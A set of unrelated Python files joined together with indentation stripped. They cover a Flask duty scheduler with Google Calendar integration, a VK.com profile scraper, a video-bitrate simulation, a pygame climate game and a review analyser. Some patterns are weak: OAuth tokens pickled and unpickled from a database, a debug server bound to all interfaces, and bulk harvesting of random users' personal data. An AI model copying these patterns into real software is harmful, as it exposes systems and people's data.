dbHallId = cur.fetchone()
if dbHallId is None:
# If we returned no values, then something fishy is going on.
# Simply return a not authorized message and stop processing.
logging.info("User Not Authorized - RA: {} attempted to overwrite Hall Settings for : {}"
.format(userDict["ra_id"], userDict["hall_id"]))
return jsonify(stdRet(0, "NOT AUTHORIZED"))
else:
# Otherwise go ahead and update the value.
logging.info("User: {} is updating Hall Setting: '{}' for Hall: {}".format(userDict["ra_id"],
setName, userDict["hall_id"]))
cur.execute("UPDATE res_hall SET name = %s WHERE id = %s", (setVal, userDict["hall_id"]))
# set the return value to successful
return jsonify(stdRet(1, "successful"))
else:
# We are attempting to update a setting that does not require any special attention.
# Currently there are no other settings to be modified so this is just a placeholder
# for future implementation.
pass
# Return the result back to the client.
return jsonify(stdRet(1, "successful"))
@app.route("/api/getHallSettings", methods=["GET"])
@login_required
def getHallSettings(hallId=None):
# Return an object containing the list of Hall Settings for the desired Hall
fromServer = True
if hallId is None: # Effectively: If API was called from the client and not from the server
userDict = getAuth() # Get the user's info from our database
hallId = userDict["hall_id"]
fromServer = False
# Check to see if the user is authorized to view these settings
if userDict["auth_level"] < 3:
logging.info("User Not Authorized - RA: {} attempted to get Hall Settings".format(userDict["ra_id"]))
return jsonify(stdRet(-1, "NOT AUTHORIZED"))
logging.debug("Retrieving Hall Setting information for Hall: {}, From Server: {}".format(hallId, fromServer))
# Create the setting list that will be returned
settingList = []
cur = conn.cursor()
# Get the hall name
cur.execute("SELECT name FROM res_hall WHERE id = %s", (hallId,))
tmp = {"settingName": "Residence Hall Name",
"settingDesc": "The name of the Residence Hall.",
"settingVal": cur.fetchone()[0]}
# Add the hall settings to the settingList
settingList.append(tmp)
# Get the Google Calendar Information
cur.execute("""SELECT EXISTS
(SELECT token
FROM google_calendar_info
WHERE res_hall_id = %s)""", (hallId,))
tmp = {"settingName": "Google Calendar Integration",
"settingDesc": "Connecting a Google Calendar account allows AHDs and HDs to export a given month's duty schedule to Google Calendar.",
"settingVal": "Connected" if cur.fetchone()[0] else "Not Connected"}
settingList.append(tmp)
if fromServer:
return settingList
else:
return jsonify(settingList)
# -- Integration Methods --
def createGoogleCalendar(calInfoId):
# Create a Secondary Google Calendar for the provided hall
# Get the hall's credentials
cur = conn.cursor()
logging.debug("Searching for the Hall's Calendar Information")
cur.execute("SELECT token FROM google_calendar_info WHERE id = %s",
(calInfoId,))
memview = cur.fetchone()
# Check to see if we got a result
if memview is None:
logging.info("No Google Calendar token found for Id: {}".format(calInfoId))
return jsonify(stdRet(-1, "No Token Found"))
# If there is a token in the DB it will be returned as a MemoryView
logging.debug("Converting Google Calendar Token to pickle")
# Convert the memview object to BytesIO object
tmp = BytesIO(memview[0])
# Convert the BytesIO object to a google.oauth2.credentials.Credentials object
# This is done by unpickling the object
token = pickle.load(tmp)
logging.debug("Creating Google Calendar")
calId = gCalInterface.createGoogleCalendar(token)
logging.debug("Updating Google Calendar Information")
# Add the calendar_id into the Google Calendar Info table
cur.execute("""UPDATE google_calendar_info
SET calendar_id = %s
WHERE id = %s""", (calId, calInfoId))
conn.commit()
return stdRet(1, "Successful")
@app.route("/int/GCalRedirect", methods=["GET"])
@login_required
def returnGCalRedirect():
# Redirect the user to the Google Calendar Authorization Page
userDict = getAuth()
# Make sure the user is at least a Hall Director
if userDict["auth_level"] < 3:
logging.info("User Not Authorized - RA: {} attempted to connect Google Calendar for Hall: {} -G"
.format(userDict["ra_id"],userDict["hall_id"]))
return jsonify(stdRet(-1, "NOT AUTHORIZED"))
# Get the authorization url and state from the Google Calendar Interface
authURL, state = gCalInterface.generateAuthURL(HOST_URL + "/int/GCalAuth")
# Create the DB cursor object
cur = conn.cursor()
logging.debug("Checking for previously associated calendar for Hall: {}".format(userDict["hall_id"]))
# Check to see if a Google Calendar has been associated with the given hall.
# This is used to keep track of the incoming authorization response
cur.execute("SELECT id FROM google_calendar_info WHERE res_hall_id = %s",
(userDict["hall_id"], ))
res = cur.fetchone()
# If there is not a calendar associated with the hall
if res is None:
# Then insert a new row
logging.debug("Insert new row into Google Calendar Info table")
cur.execute("""INSERT INTO google_calendar_info (res_hall_id, auth_state)
VALUES (%s, %s)""", (userDict["hall_id"], state))
else:
# Otherwise update the entry for the appropriate hall with the current state
logging.debug("Updating previous Google Calendar Info Row: {}".format(res[0]))
cur.execute("UPDATE google_calendar_info SET auth_state = %s WHERE id = %s",
(state, res[0]))
logging.debug("Committing auth state to DB for Hall: {}".format(userDict["hall_id"]))
conn.commit()
# Redirect the user to the Google Authorization URL
return redirect(authURL)
@app.route("/int/GCalAuth", methods=["GET"])
@login_required
def handleGCalAuthResponse():
# Generate Google Calendar credentials and save in DB
# Get the user's information
userDict = getAuth()
# Ensure that the user is at least a Hall Director
if userDict["auth_level"] < 3:
logging.info("User Not Authorized - RA: {} attempted to connect Google Calendar for Hall: {} -R"
.format(userDict["ra_id"],userDict["hall_id"]))
return jsonify(stdRet(-1, "NOT AUTHORIZED"))
# Get the state that was passed back by the authorization response.
# This is used to map the request to the response
state = request.args.get("state")
logging.debug("Found state in request")
# Create DB cursor object
cur = conn.cursor()
# Identify which hall maps to the state
logging.debug("Searching for hall associated with state")
cur.execute("SELECT id FROM google_calendar_info WHERE auth_state = %s", (state,))
calInfoId = cur.fetchone()
# Check to see if we have a result
if calInfoId is None:
# If not, stop processing
logging.debug("Associated hall not found")
return jsonify(stdRet(-1, "Invalid State Received"))
# Get the credentials from the Google Calendar Interface
creds = gCalInterface.handleAuthResponse(request.url, HOST_URL + "/int/GCalAuth")
logging.debug("Received user credentials from interface")
# Create BytesIO to hold the pickled credentials
tmp = BytesIO()
# Dump the pickled credentials into the BytesIO
pickle.dump(creds, tmp)
# Set the read position back to the beginning of the buffer.
# Without doing this, pickle.load will get an EOF error.
tmp.seek(0)
logging.debug("Created credential pickle")
# Insert the credentials in the DB for the respective res_hall
cur.execute("""UPDATE google_calendar_info
SET token = %s ,
auth_state = NULL
WHERE id = %s;""",
(tmp.getvalue(), calInfoId[0]))
logging.debug("Committing credentials to DB for Google Calendar Info: {}".format(calInfoId[0]))
res = createGoogleCalendar(calInfoId[0])
# If the calendar creation failed...
if res["status"] < 0:
# Then rollback the Google Calendar Connection
logging.warning("Unable to Create Google Calendar- Rolling back changes")
conn.rollback()
else:
# Otherwise add the calendar id to the DB.
logging.debug("Adding newly created Calendar Id to DB")
logging.info("Google Calendar Creation complete for Hall: {}".format(userDict["hall_id"]))
conn.commit()
# Return the user back to the Manage Hall page
return redirect(url_for("manHall"))
@app.route("/int/disconnectGCal", methods=["GET"])
@login_required
def disconnectGoogleCalendar():
# Disconnect the Google Calendar for the given hall/user
userDict = getAuth()
# Make sure the user is at least a Hall Director
if userDict["auth_level"] < 3:
logging.info("User Not Authorized - RA: {} attempted to disconnect Google Calendar for Hall: {} -G"
.format(userDict["ra_id"], userDict["hall_id"]))
return jsonify(stdRet(-1, "NOT AUTHORIZED"))
# Create the cursor
cur = conn.cursor()
# Delete the google_calendar_info record for the appropriate hall.
cur.execute("DELETE FROM google_calendar_info WHERE res_hall_id = %s;", (userDict["hall_id"], ))
# Redirect user back to Manage Hall page
return redirect(url_for("manHall"))
@app.route("/api/exportToGCal", methods=["GET"])
@login_required
def exportToGCal():
# Get the user's information
userDict = getAuth()
# Ensure that the user is at least an AHD
if userDict["auth_level"] < 2:
logging.info("User Not Authorized - RA: {} attempted to export schedule to Google Calendar"
.format(userDict["ra_id"]))
return jsonify(stdRet(-1, "NOT AUTHORIZED"))
logging.info("Attempting to export Schedule to Google Calendar")
# Get the Google Calendar credentials from the DB
logging.debug("Retrieving Google Calendar info from DB for Hall: {}".format(userDict["hall_id"]))
cur = conn.cursor()
cur.execute("SELECT calendar_id, token FROM google_calendar_info WHERE res_hall_id = %s",
(userDict["hall_id"], ))
res = cur.fetchone()
# Check to see if we got a result
if res is None:
logging.info("No Google Calendar token found for Hall: {}".format(userDict["hall_id"]))
return jsonify(stdRet(-1, "No Token Found"))
else:
# Split the result into its components
gCalId, memview = res
logging.debug("GCalId: {}".format(gCalId))
# If there is a token in the DB it will be returned as a MemoryView
# Convert the memview object to BytesIO object
tmp = BytesIO(memview)
# Convert the BytesIO object to a google.oauth2.credentials.Credentials object
# This is done by unpickling the object
token = pickle.load(tmp)
logging.debug("Google Calendar information found.")
# Get the month/schedule information from the request args
# and create the start and end strings
monthNum = int(request.args.get("monthNum"))
year = int(request.args.get("year"))
start = formatDateStr(1, monthNum, year)
end = formatDateStr(calendar.monthrange(year, monthNum)[-1], monthNum, year)
logging.debug("Retrieving schedule information for MonthNum: {} and Year: {}".format(monthNum, year))
# Get the appropriate regular-duty schedule from the DB
# Should be able to leverage existing RADSA API
regSched = getSchedule2(start=start, end=end,
hallId=userDict["hall_id"], showAllColors=True)
# Get the appropriate break-duty schedule from the DB
# Should be able to leverage existing RADSA API
breakSched = getBreakDuties(start=start, end=end,
hallId=userDict["hall_id"], showAllColors=True)
logging.debug("Exporting schedule to Google Calendar.")
# Pass the combined regular and break duty schedule to the Integratinator to be exported.
status = gCalInterface.exportScheduleToGoogleCalendar(token, gCalId, regSched + breakSched)
# If the export failed
if status < 0:
# Log that an error was encountered for future reference.
logging.warning("Error: {} encountered while exporting to Google Calendar for Hall: {}".format(status, userDict["hall_id"]))
# Then we will need to let the user know that they will need
# to connect/reconnect their Google Calendar Account.
return jsonify(stdRet(0, "Reconnect Google Calendar Account"))
# Otherwise report that it was a success!
return jsonify(stdRet(1, "successful"))
# -- Error Handling --
@app.route("/error/<string:msg>")
def err(msg):
logging.warning("Rendering error page with Message: {}".format(msg))
return render_template("error.html", errorMsg=msg)
if __name__ == "__main__":
local = bool(os.environ["USE_ADHOC"])
if local:
app.run(ssl_context="adhoc", debug=True, host='0.0.0.0')
else:
app.run()
|
<reponame>alexeyknorre/PyVK
# -*- coding: utf-8 -*-
"""
Script for downloading, parsing and saving to CSV public user data from VK.com.
"""
import os
import csv
import random
import requests
import ast
# Input variables
basic_parameters = ["uid", "first_name", "last_name"]
result_file = "../results/profiles.csv"
response_file = "../results/response.txt"
#parameters = ""
parameters = "sex, bdate, country, city, deactivated, last_seen, has_mobile, site, education, universities, schools, status, relatives, relations, personal, career, contacts, exports, relation, connections, exports, wall_comments, activities, interests, music, movies, tv, books, games, about, quotes, has_photo, can_post, can_see_all_posts, can_see_audio, can_write_private_message, can_send_friend_request, followers_count"
### CODE
# Main functions
def vk2csv(number_of_ids, result_file=result_file, parameters = parameters,
response_file=response_file, delete_response=False):
if isinstance(number_of_ids, list):
ids = number_of_ids
else:
ids = random_ids(number_of_ids)
with open("../results/ids.txt", 'w') as f:
f.write(str(ids))
get_data(ids, parameters, response_file)
process_data(result_file, response_file, delete_response)
# Selecting random ids to parse
def random_ids(n):
ids = []
for i in range(1, n + 1):
ids.append(random.randint(1, 327633900))
# removing duplicates
ids = list(set(ids))
return ids
# Getting data from server. Chunk query with cooldown and repeat in case of SSL fail are implemented
def get_data(ids, parameters, response_file, threshold=200):
def query(response):
try:
response = requests.get("https://api.vk.com/method/users.get?user_ids=" + str_ids[:-1] +
"&fields=" + parameters).json()
except:
print("Got error on " + str(count) + " profiles, repeating...")
response = query(response)
return response
#print("Quering VK API...")
str_ids = ""
count = 0
response = []
for i in ids:
str_ids += str(i) + ","
count += 1
if count % threshold == 0 or count == len(ids):
response = query(response)
save_response(response, response_file)
str_ids = ""
print("Got " + str(count) + " profiles...")
response = []
#print("Data acquired.")
# Function for flattening nested dictionaries.
# isInstance checks whether the data structure of a particular type
# Heavy if-else usage here is because of complicated situations when there is
# dictionary inside list inside dictionary
def flatten_dict(d, parent_key='', sep='_'):
items = []
for k, v in d.items():
new_key = parent_key + sep + k if parent_key else k
if isinstance(v, dict):
items.extend(flatten_dict(v, new_key, sep=sep).items())
if v and isinstance(v, list):
count = 1
for i in v:
new_key = parent_key + k + sep + str(count)
if isinstance(i, dict):
items.extend(flatten_dict(i, new_key, sep=sep).items())
else:
items.append((new_key, i))
count += 1
else:
items.append((new_key, v))
return dict(items)
# Constructing headers for CSV
def construct_header(response, basic_parameters=basic_parameters):
header = []
for person in response:
header += list(set(flatten_dict(person)) - set(header))
header = list(set(header) - set(basic_parameters))
header = basic_parameters + sorted(header)
return header
# Parsing data and saving in CSV file
def save_response(response,response_file):
with open(response_file, 'a') as f:
for s in response["response"]:
s = str(s).encode('utf-8') + str("\n").encode("utf-8")
f.write(str(s))
# with open(output, "a") as output:
# output.write(response)
def process_data(result_file, response_file, delete_response):
#print "Loading response into memory..."
response = []
with open(response_file, 'r') as f:
for line in f:
response.append(ast.literal_eval(line.rstrip('\n')))
# response = ast.literal_eval(response)
#print "Preparing headers..."
fieldnames = construct_header(response)
#print "Saving data into CSV..."
with open(result_file, "wb") as output:
writer = csv.writer(output, quotechar='"', quoting=csv.QUOTE_ALL)
writer.writerow(fieldnames)
for person in response:
person = flatten_dict(person)
person_data = []
for item in fieldnames:
if item in person:
if isinstance(person[item], basestring):
person_data.append(person[item].encode("utf-8"))
else:
person_data.append(str(person[item]))
else:
person_data.append('')
writer.writerow(person_data)
if delete_response:
os.remove(response_file)
#print "Successfully saved."
|
from ipaddress import summarize_address_range
import os
from tqdm import tqdm
import numpy as np
import time
# import envs.env_v2 as env
import envs.fixed_env_real_bw_v2 as env_oracle_v2
# import envs.env as env
import envs.fixed_env as env_test
import envs.fixed_env_real_bw as env_oracle
from envs import load_trace
VIDEO_BIT_RATE = [300,750,1200,1850,2850,4300] # kbps
TOTAL_CHUNK_NUM = 149
REBUF_PENALTY_LOG = 8
SMOOTH_PENALTY = 0.5
S_INFO = 16 #
S_LEN = 2 # maximum length of states
C_LEN = 10 # content length
M_IN_K = 1000
TRAIN_TRACES = './envs/traces/pre_webget_1608/cooked_traces/'
SUMMARY_DIR = './Results/sim'
def main():
start = time.process_time()
# # test(TEST_MODEL, TEST_TRACES, LOG_FILE)
## load the training traces
# all_cooked_time, all_cooked_bw, _ = load_trace.load_trace(TRAIN_TRACES)
## -----------------------------------configures-------------------------------------------------
video = 'Avengers'
video_size_file = './envs/video_size/' + video + '/video_size_'
video_psnr_file = './envs/video_psnr/' + video + '/chunk_psnr'
Train_traces = TRAIN_TRACES
log_path_ini = SUMMARY_DIR
all_cooked_time, all_cooked_bw, all_file_names = load_trace.load_trace(Train_traces)
# train_env = env.Environment(all_cooked_time=all_cooked_time, all_cooked_bw=all_cooked_bw, video_size_file= video_size_file, video_psnr_file=video_psnr_file)
# train_env.set_env_info(S_INFO, S_LEN, C_LEN, TOTAL_CHUNK_NUM, VIDEO_BIT_RATE, REBUF_PENALTY_LOG, SMOOTH_PENALTY)
train_env_1 = env_oracle_v2.Environment(all_cooked_time=all_cooked_time, all_cooked_bw=all_cooked_bw, video_size_file= video_size_file, video_psnr_file=video_psnr_file)
train_env_1.set_env_info(S_INFO, S_LEN, C_LEN, TOTAL_CHUNK_NUM, VIDEO_BIT_RATE, REBUF_PENALTY_LOG, SMOOTH_PENALTY)
bit_rate = int(2)
last_quality = 0
time_stamp = 0.
rebuff_p = REBUF_PENALTY_LOG
smooth_p = SMOOTH_PENALTY
mpc_horizon = 3
train_env = train_env_1
# model.load_state_dict(model.state_dict())
all_file_name = all_file_names
log_path = log_path_ini + '_' + all_file_name[train_env.trace_idx]
log_file = open(log_path, 'w')
time_stamp = 0
for video_count in tqdm(range(len(all_file_name))):
while True:
delay, sleep_time, buffer_size, rebuf, \
video_chunk_size, next_video_chunk_sizes, \
next_video_chunk_psnrs, end_of_video, video_chunk_remain, \
curr_chunk_sizes, curr_chunk_psnrs = train_env.get_video_chunk(bit_rate)
time_stamp += delay # in ms
time_stamp += sleep_time # in ms
# reward is video quality - rebuffer penalty - smooth penalty
curr_quality = curr_chunk_psnrs[bit_rate]
reward = curr_quality \
- rebuff_p * rebuf \
- smooth_p * np.abs(curr_quality - last_quality)
last_quality = curr_quality
log_file.write(str(time_stamp / M_IN_K) + '\t' +
str(VIDEO_BIT_RATE[bit_rate]) + '\t' +
str(buffer_size) + '\t' +
str(rebuf) + '\t' +
str(video_chunk_size) + '\t' +
str(delay) + '\t' +
str(reward) + '\n')
log_file.flush()
# future chunks length (try 4 if that many remaining)
last_index = int(TOTAL_CHUNK_NUM - video_chunk_remain -1)
future_chunk_length = mpc_horizon
if (TOTAL_CHUNK_NUM - last_index < mpc_horizon ):
future_chunk_length = TOTAL_CHUNK_NUM - last_index
opt_a = train_env.solving_opt(buffer_size, bit_rate, future_chunk_length, rebuff_p, smooth_p, 6)
bit_rate = opt_a
if end_of_video:
last_quality = 0
log_file.write('\n')
log_file.close()
time_stamp = 0
if video_count + 1 >= len(all_file_name):
break
else:
log_path = log_path_ini + '_' + all_file_name[train_env.trace_idx]
log_file = open(log_path, 'w')
break
end = time.process_time()
print('finish all in %s' % str(end - start))
if __name__ == '__main__':
main() |
import pygame
from random import randint, choice
import config
# tutorial:
import tutorial
tutorial.__dict__ # because flake8 ;-;
# Boiler-plate:
pygame.init()
window = pygame.display.set_mode((config.window_width, config.window_height))
pygame.display.set_caption(config.window_title)
clock = pygame.time.Clock()
all_icons = pygame.sprite.Group() # All icons on the screen are put into this Group object.
# Fonts used:
pygame.font.init()
arial = pygame.font.SysFont('Arial MT', 30)
big_arial = pygame.font.SysFont('Arial', 120)
# Initial game state values:
atmospheric_ghg_levels = 0
num_of_green_energies = 0
num_of_fossil_fuels = 50
num_of_ghg_capture_techs = 0
energy_output = 20 * num_of_fossil_fuels + num_of_green_energies
capture_offset = num_of_ghg_capture_techs
percent_fossil_fuel = 100
percent_green_energy = 0
def percentage_update():
"""Updates the percentage of energy resources that are fossil fuels and green energies"""
total = (num_of_fossil_fuels + num_of_green_energies)
global percent_fossil_fuel, percent_green_energy
percent_fossil_fuel = int(100 * (num_of_fossil_fuels / total))
percent_green_energy = int(100 * (num_of_green_energies / total))
def pollute():
"""Increase the amount of greenhouse gas in the atmosphere"""
global atmospheric_ghg_levels
atmospheric_ghg_levels += num_of_fossil_fuels
def check_if_lost():
if atmospheric_ghg_levels >= config.greenhouse_gas_limit:
return True
elif energy_output < config.energy_demand:
return True
return False
def check_if_won():
if percent_fossil_fuel <= capture_offset:
return True
return False
def draw_ghg_levels_bar():
"""Draws the Atmospheric GHG Levels stat bar onto the screen"""
if atmospheric_ghg_levels <= config.greenhouse_gas_limit:
pygame.draw.rect(window, config.gray,
pygame.Rect(config.icon_spacing,
1.5 * config.icon_spacing,
config.stat_bar_width,
config.stat_bar_height))
pygame.draw.rect(window, config.dark_red,
pygame.Rect(config.icon_spacing,
1.5 * config.icon_spacing,
(config.stat_bar_width * atmospheric_ghg_levels)
/ config.greenhouse_gas_limit,
config.stat_bar_height))
else:
pygame.draw.rect(window, config.dark_red,
pygame.Rect(config.icon_spacing,
1.5 * config.icon_spacing,
config.stat_bar_width,
config.stat_bar_height))
text = arial.render('Atmospheric GHG Levels', False, (0, 0, 0))
window.blit(text, (config.icon_spacing, 0.5 * config.icon_spacing))
def draw_energy_demand_bar():
"""Draws the Energy Demand stat bar onto the screen """
if energy_output <= 2 * config.energy_demand:
pygame.draw.rect(window, config.gray,
pygame.Rect(config.icon_spacing,
1.5 * config.icon_spacing + config.window_height / 5,
config.stat_bar_width,
config.stat_bar_height))
pygame.draw.rect(window, config.yellow,
pygame.Rect(config.icon_spacing,
1.5 * config.icon_spacing + config.window_height / 5,
(config.stat_bar_width / 2)
* energy_output / config.energy_demand,
config.stat_bar_height))
else:
pygame.draw.rect(window, config.yellow,
pygame.Rect(config.icon_spacing,
1.5 * config.icon_spacing + config.window_height / 5,
config.stat_bar_width,
config.stat_bar_height))
pygame.draw.rect(window, config.black,
pygame.Rect(config.icon_spacing + config.stat_bar_width / 2 - 2,
1.5 * config.icon_spacing + config.window_height / 5 - 4,
4,
config.stat_bar_height + 8))
text = arial.render('Energy Output & Demand', False, (0, 0, 0))
window.blit(text, (config.icon_spacing, 0.5 * config.icon_spacing + config.window_height / 5))
def draw_ratio_bar():
"""Draws the Green Energy : Fossil Fuels ratio stat bar onto the screen"""
pygame.draw.rect(window, config.darkish_brown,
pygame.Rect(config.icon_spacing,
1.5 * config.icon_spacing + 2 * config.window_height / 5,
config.stat_bar_width,
config.stat_bar_height))
pygame.draw.rect(window, config.green,
pygame.Rect(config.icon_spacing,
1.5 * config.icon_spacing + 2 * config.window_height / 5,
config.stat_bar_width * percent_green_energy / 100,
config.stat_bar_height))
text = arial.render('Green Energy : Fossil Fuels', False, (0, 0, 0))
window.blit(text, (config.icon_spacing, 0.5 *
config.icon_spacing + 2 * config.window_height / 5))
def draw_emission_offset_bar():
"""Draws the Emissions Offset stat bar onto the screen"""
pygame.draw.rect(window, config.gray,
pygame.Rect(config.icon_spacing,
1.5 * config.icon_spacing + 3 * config.window_height / 5,
config.stat_bar_width,
config.stat_bar_height))
pygame.draw.rect(window, config.grayish_light_blue,
pygame.Rect(config.icon_spacing,
1.5 * config.icon_spacing + 3 * config.window_height / 5,
config.stat_bar_width * num_of_ghg_capture_techs / 100,
config.stat_bar_height))
text = arial.render('Emissions Offset', False, (0, 0, 0))
window.blit(text, (config.icon_spacing, 0.5 *
config.icon_spacing + 3 * config.window_height / 5))
def draw_stat_bars():
"""Draws all of the stat bars onto the screen and instructions to pause"""
draw_ghg_levels_bar()
draw_energy_demand_bar()
draw_ratio_bar()
draw_emission_offset_bar()
text = arial.render('Press P to Pause', False, (0, 0, 0))
window.blit(text, (config.icon_spacing + config.stat_bar_width / 4,
0.5 * config.icon_spacing + 4 * config.window_height / 5
+ config.stat_bar_height / 2))
class Icon(pygame.sprite.Sprite):
def __init__(self, energy_source, left_coordinate):
"""
Each icon has an image, an energy source, an energy type, and an
x-coordinate. Newly generated icons always start at the top of
the screen, i.e. their initial y-coordinates are always 0.
"""
pygame.sprite.Sprite.__init__(self)
self.image = energy_source
self.rect = self.image.get_rect()
self.rect.bottom = 0
self.rect.left = left_coordinate
if energy_source in config.fossil_fuel_types:
self.type = 'fossil fuel'
elif energy_source in config.green_energy_types:
self.type = 'green energy'
elif energy_source == config.ghg_capture_tech:
self.type = 'ghg capture tech'
def update(self):
"""
Every frame each icon falls down the screen at the specified
speed. When it reaches the bottom it is removed.
"""
self.rect.y += config.icon_speed
if self.rect.top > config.window_height:
self.kill()
def icon_clicked():
"""This runs if an icon is clicked."""
global num_of_fossil_fuels, num_of_green_energies, num_of_ghg_capture_techs
global energy_output, capture_offset
if event.button == 1: # Left-click
if icon.type == 'fossil fuel':
num_of_fossil_fuels += 1
energy_output += 20
elif icon.type == 'green energy':
num_of_green_energies += 1
energy_output += 1
else:
num_of_ghg_capture_techs += 1
capture_offset += 1
print([num_of_ghg_capture_techs, num_of_green_energies, num_of_fossil_fuels, energy_output])
percentage_update()
icon.kill()
elif event.button == 3: # Right-click
if icon.type == 'fossil fuel' and num_of_fossil_fuels > 0:
num_of_fossil_fuels -= 1
energy_output -= 20
elif icon.type == 'green energy' and num_of_green_energies > 0:
num_of_green_energies -= 1
energy_output -= 1
elif num_of_ghg_capture_techs > 0:
num_of_ghg_capture_techs -= 1
capture_offset -= 1
print([num_of_ghg_capture_techs, num_of_green_energies, num_of_fossil_fuels, energy_output])
percentage_update()
icon.kill()
else:
pass
"""
This list keeps track of all the rows created. It is used to create the
first row, and also to tell where the previous row created is located so
you know when enough space has gone by to create the next row.
"""
list_of_rows = []
def create_row():
"""This creates a list of icons. It does not display them to the screen."""
global list_of_rows
row = []
for i in range(config.number_of_icons_in_a_row):
n = randint(0, config.ghg_capture_icon_rarity)
if n == config.ghg_capture_icon_rarity:
energy = config.ghg_capture_technology
elif n % 2 == 0:
energy = choice(config.fossil_fuel_types)
else:
energy = choice(config.green_energy_types)
icon = Icon(energy, config.first_x_coordinate + i * (64 + config.icon_spacing))
row.append(icon)
list_of_rows.append(row)
return row
def display_row():
"""This creates a row of icons and displays them to the screen at the appropriate location."""
global list_of_rows
if len(list_of_rows) == 0:
row = create_row()
for icon in row:
all_icons.add(icon)
else:
for i in range(config.number_of_icons_in_a_row):
if list_of_rows[-1][i].rect.top < config.icon_spacing:
pass
else:
row = create_row()
for icon in row:
all_icons.add(icon)
# Used to make an FPS counter:
frames = 0
fps_text = arial.render('FPS: ?/60', False, (0, 0, 0)) # FPS counter text on screen
def fps_counter():
"""Displays an FPS counter on the screen"""
global frames, fps_text
if frames % 10 == 0: # Update FPS counter on screen every 10 frames
fps_displayed = str(int(clock.get_fps()))
fps_text = arial.render(f'FPS: {fps_displayed}/60', False, (0, 0, 0))
window.blit(fps_text, (0, config.window_height - 20))
pause = False
running = True
tint = 0
while running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
elif event.type == pygame.MOUSEBUTTONDOWN:
mouse_position = pygame.mouse.get_pos()
for icon in all_icons:
if icon.rect.collidepoint(mouse_position):
icon_clicked()
# Pause sequence:
elif event.type == pygame.KEYUP:
if event.key == pygame.K_p:
pause = True
while pause:
for event2 in pygame.event.get():
if event2.type == pygame.KEYUP:
if event2.key == pygame.K_p:
pause = False
elif event2.type == pygame.QUIT:
pause = False
running = False
window.fill(config.white)
pollute()
display_row()
draw_stat_bars()
all_icons.update()
all_icons.draw(window)
fps_counter()
frames += 1
pygame.display.update()
if check_if_lost() or check_if_won():
pause = True # pause the game
pygame.display.update()
if check_if_lost():
color = '(255-(64*tint), 255-(192*tint), 255-(255*tint))'
elif check_if_won():
color = '(255-(255*tint), 255, 255-(128*tint))'
else: # u wOT
continue
tint = 0
while tint <= 1:
window.fill(eval(color), special_flags=pygame.BLEND_MULT)
pygame.display.update()
tint += 0.05
clock.tick(config.fps)
from_color = eval(color)
tint = 0
while tint <= 1:
window.fill(eval(color))
pygame.display.update()
tint += 0.1
clock.tick(config.fps)
text = 'You '
if check_if_lost():
text += 'lost...'
elif check_if_won():
text += 'won!'
else: # u wOT
continue
ending_text = big_arial.render(text, False, (0, 0, 0))
window.blit(ending_text, (100, 100))
pygame.display.update()
while running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
clock.tick(config.fps)
pygame.quit()
|
<reponame>jagoPG/-restaurant-ml-inspector
#!/usr/bin/env
# -*- coding: utf-8 -*-
"""
Copyright 2017-2018 <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import logging
from tabulate import tabulate
from textblob import TextBlob
from src.application.analysis.english_analysis import EnglishAnalysis
from src.application.analysis.evaluated_word import EvaluatedWord
from src.application.analysis.rated_review_analysis import RatedReviewAnalysis
from src.domain.exception import ReviewIsNotAnalysable
from src.domain.model import KeyPoint
from src.infrastructure.dependency_injector import Dependency
class ProcessRestaurantReviewsCommand(object):
"""
Processes all the reviews from the restaurant for finding the strong and
improvements points from the business.
"""
def __init__(self, project_id):
self.project_id = project_id
class ProcessRestaurantReviews(Dependency):
def __init__(self):
self.project_repository = None
self.keyword_repository = None
self.review_repository = None
self.analysis_repository = None
self.point_repository = None
self.spanish_analyser = None
self.synonym_reducer = None
self._english_reviews = []
self._spanish_reviews = []
def invoke(self, command):
self.__clean_vars()
project = self.__retrieve_project(command.project_id)
analysis = project.get_analysis()
restaurants = self.__retrieve_restaurants(project)
# Filter reviews and classify reviews
self.__filter_not_tagged_reviews(restaurants)
tagged_spanish_results, tagged_english_results = \
self.__filter_tagged_reviews(restaurants)
# Analyse reviews
english_results = self.__process_english_reviews(self._english_reviews)
spanish_results = self.__process_spanish_reviews(self._spanish_reviews)
# Perform word equivalence
logging.debug(
english_results,
spanish_results,
tagged_english_results,
tagged_spanish_results
)
english_results = self.__mix_results(
english_results, tagged_english_results
)
spanish_results = self.__mix_results(
spanish_results, tagged_spanish_results
)
# Mix depending on synonyms
self.synonym_reducer.clean()
self.synonym_reducer.reduce(english_results, 'en')
self.synonym_reducer.reduce(spanish_results, 'es')
# Summarize data
self.__store_conclusions(analysis, self.synonym_reducer.words)
def __clean_vars(self):
self._english_reviews = []
self._spanish_reviews = []
def __retrieve_project(self, project_id):
return self.project_repository.get_of_id(project_id)
@staticmethod
def __retrieve_restaurants(project):
restaurants = []
for restaurant in project.restaurants:
restaurants.append(restaurant)
return restaurants
def __filter_tagged_reviews(self, restaurants):
tagged_review_analysis = RatedReviewAnalysis(
self.keyword_repository, restaurants
)
tagged_review_analysis.analyse()
return (
tagged_review_analysis.get_spanish_results(),
tagged_review_analysis.get_english_results()
)
def __filter_not_tagged_reviews(self, restaurants):
for restaurant in restaurants:
self.__process_restaurants_in_social_network(restaurant)
def __process_restaurants_in_social_network(self, restaurant):
logging.debug(
'Analise %s social network reviews'
% restaurant.source_network.single().name
)
reviews = restaurant.get_reviews()
for review in reviews:
if review.is_spam or review.sentiment is not None:
continue
try:
self.__classify_review(review)
except ReviewIsNotAnalysable:
self.__set_review_not_analysable(review)
def __classify_review(self, review):
body = review.review_body
self.__check_review_is_long_enough(body)
body = TextBlob(review.review_body)
language = body.detect_language()
self.__check_review_language_is_supported(language)
if language == 'en':
self._english_reviews.append(review)
elif language == 'es':
self._spanish_reviews.append(review)
@staticmethod
def __check_review_is_long_enough(body):
if not len(body) > 3:
raise ReviewIsNotAnalysable()
@staticmethod
def __check_review_language_is_supported(language):
if language not in ['en', 'es']:
raise ReviewIsNotAnalysable()
def __process_english_reviews(self, english_reviews):
analysis = EnglishAnalysis(
self.keyword_repository, english_reviews
)
analysis.analyse()
return analysis.get_results()
def __process_spanish_reviews(self, spanish_reviews):
try:
self.spanish_analyser.analyse(spanish_reviews)
except ValueError as exception:
